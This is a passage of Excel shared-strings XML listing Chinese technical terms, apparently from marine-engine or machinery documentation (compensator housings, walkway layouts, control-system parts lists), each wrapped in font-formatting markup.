        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丙烯醛基板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>波兰语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箔膜封装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器壳体，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器壳体，加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带法兰轴锻</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带活接头的焊接接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带离合器的输入轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带螺纹的销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带桥控的控制设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带伺服活塞的输出轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不干胶带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不同的主机座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不同删除符号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢扎带</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不在服务范围</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置图，电机控制室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置图，主驾驶台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件或松散部件安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件检测指导</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件列表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气收集器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件列表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件列表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扇形支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件描述及维护手册</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>除气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垂直管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件总装供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料规格批注</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数集</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数误差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>残油标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>舱壁连接器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧底层走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧端部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>俯视图及底视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧各种管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧各种管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧机座放泄管装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上部主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上部走台安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上部走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上部走台支架布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上层走台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧上平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧下部地板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧下部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧下部走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧下部走台支架布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧中层走台安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧中间平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵发应急支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵盘和控制装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵期间检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台，转换台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台灯罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台电路图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统部件电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统电气部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换位</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统描述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作，维护，部件手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作错误报警离合器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作记录</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作系统说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作限制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作职责</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽形螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>草图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧板焊接图</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧导承安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
